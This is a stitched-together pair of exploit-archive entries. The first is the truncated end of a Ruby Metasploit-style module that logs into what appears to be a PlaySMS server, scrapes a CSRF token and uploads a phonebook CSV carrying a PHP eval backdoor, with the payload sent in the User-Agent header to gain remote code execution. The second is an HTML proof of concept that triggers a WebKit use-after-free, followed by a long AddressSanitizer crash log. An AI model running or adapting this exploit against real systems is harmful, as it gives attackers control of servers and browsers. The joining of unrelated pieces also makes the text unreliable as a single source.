vprint_error('Unable to access the index.php file')
return CheckCode::Unknown
end
if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
return Exploit::CheckCode::Appears
end
return CheckCode::Safe
end
def login
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'vars_get' => {
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
}
})
# Grabbing CSRF token from body
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
vprint_good("X-CSRF-Token for login : #{csrf}")
cookies = res.get_cookies
vprint_status('Trying to Login ......')
# Send Creds with cookies.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
'op' => 'login',
}.to_a.shuffle],
'vars_post' => Hash[{
'X-CSRF-Token' => csrf,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}.to_a.shuffle],
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
# Try to access index page with authenticated cookie.
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
})
# if we redirect to core_welcome dan we assume we have authenticated cookie.
if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome')
print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
return cookies
else
fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
end
end
# Tested successfully on Dina: 1.0.1 machine on vulnhub.
# Link : https://www.vulnhub.com/entry/dina-101,200/
def exploit
cookies = login
# Agian CSRF token.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'feature_phonebook',
'route' => 'import',
'op' => 'list',
}.to_a.shuffle]
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
# Grabbing CSRF token from body
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
vprint_good("X-CSRF-Token for upload : #{csrf}")
# Payload.
evil = "<?php $t=$_SERVER['HTTP_USER_AGENT']; eval($t); ?>"
#making csv file body
final_csv = "Name,Email,Department\n"
final_csv << "#{evil},#{rand(1..100)},#{rand(1..100)}"
# setup POST request.
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token
post_data.add_part(final_csv, content_type = 'text/csv', transfer_encoding = nil, content_disposition = 'form-data; name="fnpb"; filename="agent22.csv"') #payload
data = post_data.to_s
vprint_status('Trying to upload malicious CSV file ....')
# Lets Send Upload request.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'POST',
'agent' => payload.encode,
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'feature_phonebook',
'route' => 'import',
'op' => 'import',
}.to_a.shuffle],
'headers' => {
'Upgrade-Insecure-Requests' => '1',
},
'Connection' => 'close',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
})
end
end
<!--
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of Revision 227958 on OSX.
PoC (Note: It might take multiple refreshes for the issue to be triggered):
=================================================================
-->
<style>
input:enabled { content: url(#foo); padding-top: 0vmin }
.class4 { -webkit-transform: scale(1, 255); }
</style>
<script>
function jsfuzzer() {
document.head.appendChild(kg);
var test = input.scrollHeight;
}
</script>
<body onload=jsfuzzer()>
<keygen id="kg" class="class4">
<input id="input" type="search">
<!--
=================================================================
ASan log:
=================================================================
==26541==ERROR: AddressSanitizer: heap-use-after-free on address 0x61200009e4b8 at pc 0x0003000e0a07 bp 0x7ffee44084a0 sp 0x7ffee4408498
READ of size 8 at 0x61200009e4b8 thread T0
==26541==WARNING: invalid path to external symbolizer!
==26541==WARNING: Failed to use and restart external symbolizer!
#0 0x3000e0a06 in WTF::Ref<WebCore::StyleRareInheritedData, WTF::DumbPtrTraits<WebCore::StyleRareInheritedData> >::ptr() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0a06)
#1 0x3000e09d8 in WebCore::DataRef<WebCore::StyleRareInheritedData>::operator->() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe09d8)
#2 0x300d6d71c in WebCore::RenderStyle::effectiveZoom() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd6d71c)
#3 0x3020214af in WebCore::adjustForAbsoluteZoom(int, WebCore::RenderStyle const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20214af)
#4 0x3008d391d in WebCore::jsElementScrollHeightGetter(JSC::ExecState&, WebCore::JSElement&, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8d391d)
#5 0x3008be66d in long long WebCore::IDLAttribute<WebCore::JSElement>::get<&(WebCore::jsElementScrollHeightGetter(JSC::ExecState&, WebCore::JSElement&, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)3>(JSC::ExecState&, long long, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8be66d)
#6 0x310cb067a in JSC::PropertySlot::customGetter(JSC::ExecState*, JSC::PropertyName) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bab67a)
#7 0x310654a73 in llint_slow_path_get_by_id (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x154fa73)
#8 0x30f10a00f in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x500f)
#9 0x30f10e1a6 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x91a6)
#10 0x30f106e2f in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e2f)
#11 0x31057f045 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x147a045)
#12 0x3104ff3b0 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x13fa3b0)
#13 0x31095ad49 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1855d49)
#14 0x31095aedb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1855edb)
#15 0x31095b281 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1856281)
#16 0x301c7d758 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1c7d758)
#17 0x301cbea2b in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1cbea2b)
#18 0x3022b2c9e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x22b2c9e)
#19 0x3022a5b49 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x22a5b49)
#20 0x302b1730e in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b1730e)
#21 0x302b27c4d in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b27c4d)
#22 0x3021decff in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21decff)
#23 0x3021d80c0 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21d80c0)
#24 0x3029ca1f2 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29ca1f2)
#25 0x302ab56a3 in WebCore::CachedResourceLoader::loadDone(bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ab56a3)
#26 0x302a44ce5 in WebCore::SubresourceLoader::notifyDone() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a44ce5)
#27 0x302a41ff6 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a41ff6)
#28 0x10c4f6dcb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xceadcb)
#29 0x10c4fa12e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xcee12e)
#30 0x10c4f961f in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xced61f)
#31 0x10bb95660 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x389660)
#32 0x10b948c6e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x13cc6e)
#33 0x10b952a06 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x146a06)
#34 0x3110f68fc in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ff18fc)
#35 0x3110f7246 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ff2246)
#36 0x7fff51301720 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3720)
#37 0x7fff513bb0ab in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d0ab)
#38 0x7fff512e425f in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8625f)
#39 0x7fff512e36dc in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x856dc)
#40 0x7fff512e2f42 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84f42)
#41 0x7fff505fae25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)
#42 0x7fff505fab95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)
#43 0x7fff505fa913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)
#44 0x7fff4e8c5f5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)
#45 0x7fff4f05bb4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)
#46 0x7fff4e8bad6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)
#47 0x7fff4e889f19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)
#48 0x7fff78ec742e in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x1042e)
#49 0x7fff78ec6081 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf081)
#50 0x10b7f44d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
#51 0x7fff78bfa114 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1114)
0x61200009e4b8 is located 120 bytes inside of 320-byte region [0x61200009e440,0x61200009e580)
freed by thread T0 here:
#0 0x10f4affa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
#1 0x31114aacd in bmalloc::IsoTLS::debugFree(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2045acd)
#2 0x303573f57 in void bmalloc::IsoTLS::deallocateSlow<bmalloc::IsoConfig<320u>, WebCore::RenderSearchField>(bmalloc::api::IsoHeap<WebCore::RenderSearchField>&, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3573f57)
#3 0x303386052 in WebCore::RenderElement::removeAndDestroyChild(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3386052)
#4 0x3037eb844 in WebCore::RenderTreeBuilder::removeFromParentAndDestroyCleaningUpAnonymousWrappers(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37eb844)
#5 0x3038020f2 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType)::$_5::operator()(unsigned int) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38020f2)
#6 0x3038002d8 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38002d8)
#7 0x3037fea62 in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37fea62)
#8 0x3037fe189 in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37fe189)
#9 0x3037fd8aa in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37fd8aa)
#10 0x3021d7602 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21d7602)
#11 0x3021d8cf1 in WebCore::Document::updateStyleIfNeeded() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21d8cf1)
#12 0x302ba4d59 in WebCore::LayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ba4d59)
#13 0x302bb44d2 in WebCore::FrameView::updateContentsSize() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bb44d2)
#14 0x302d57ec3 in WebCore::ScrollView::updateScrollbars(WebCore::IntPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d57ec3)
#15 0x302d5a87f in WebCore::ScrollView::setContentsSize(WebCore::IntSize const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d5a87f)
#16 0x302b9f87b in WebCore::FrameView::setContentsSize(WebCore::IntSize const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b9f87b)
#17 0x302ba1466 in WebCore::FrameView::adjustViewSize() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ba1466)
#18 0x302ba5119 in WebCore::LayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ba5119)
#19 0x3021d991c in WebCore::Document::updateLayoutIfDimensionsOutOfDate(WebCore::Element&, WebCore::DimensionsCheck) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21d991c)
#20 0x30227defd in WebCore::Element::scrollHeight() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x227defd)
#21 0x3035e3454 in WebCore::RenderTextControlSingleLine::scrollHeight() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35e3454)
#22 0x30227df42 in WebCore::Element::scrollHeight() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x227df42)
#23 0x3008d391d in WebCore::jsElementScrollHeightGetter(JSC::ExecState&, WebCore::JSElement&, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8d391d)
#24 0x3008be66d in long long WebCore::IDLAttribute<WebCore::JSElement>::get<&(WebCore::jsElementScrollHeightGetter(JSC::ExecState&, WebCore::JSElement&, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)3>(JSC::ExecState&, long long, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8be66d)
#25 0x310cb067a in JSC::PropertySlot::customGetter(JSC::ExecState*, JSC::PropertyName) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bab67a)
#26 0x310654a73 in llint_slow_path_get_by_id (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x154fa73)
#27 0x30f10a00f in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x500f)
#28 0x30f10e1a6 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x91a6)
#29 0x30f106e2f in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e2f)
previously allocated by thread T0 here:
#0 0x10f4afa3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
#1 0x7fff78da2200 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2200)
#2 0x311150cf4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x204bcf4)
#3 0x31114a9c8 in bmalloc::IsoTLS::debugMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x20459c8)
#4 0x30356ed29 in void* bmalloc::IsoTLS::allocateSlow<bmalloc::IsoConfig<320u>, WebCore::RenderSearchField>(bmalloc::api::IsoHeap<WebCore::RenderSearchField>&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x356ed29)
#5 0x3026e720d in std::__1::unique_ptr<WebCore::RenderSearchField, WebCore::RenderObjectDeleter> WebCore::createRenderer<WebCore::RenderSearchField, WebCore::HTMLInputElement&, WebCore::RenderStyle>(WebCore::HTMLInputElement&&&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26e720d)
#6 0x3026e7156 in WebCore::SearchInputType::createInputRenderer(WebCore::RenderStyle&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26e7156)
#7 0x3025c6ef6 in WebCore::HTMLInputElement::createElementRenderer(WebCore::RenderStyle&&, WebCore::RenderTreePosition const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25c6ef6)
#8 0x3038005ae in WebCore::RenderTreeUpdater::createRenderer(WebCore::Element&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38005ae)
#9 0x3037febf6 in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37febf6)
#10 0x3037fe189 in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37fe189)
#11 0x3037fd8aa in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37fd8aa)
#12 0x3021d7602 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21d7602)
#13 0x3021d8cf1 in WebCore::Document::updateStyleIfNeeded() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21d8cf1)
#14 0x3021facd6 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21facd6)
#15 0x302744ce4 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2744ce4)
#16 0x3029af10b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29af10b)
#17 0x30297a96b in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x297a96b)
#18 0x302aa7117 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2aa7117)
#19 0x302aa3f20 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2aa3f20)
#20 0x302a41fbe in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a41fbe)
#21 0x10c4f6dcb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xceadcb)
#22 0x10c4fa12e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xcee12e)
#23 0x10c4f961f in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xced61f)
#24 0x10bb95660 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x389660)
#25 0x10b948c6e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x13cc6e)
#26 0x10b952a06 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x146a06)
#27 0x3110f6837 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ff1837)
#28 0x3110f7246 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ff2246)
#29 0x7fff51301720 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3720)
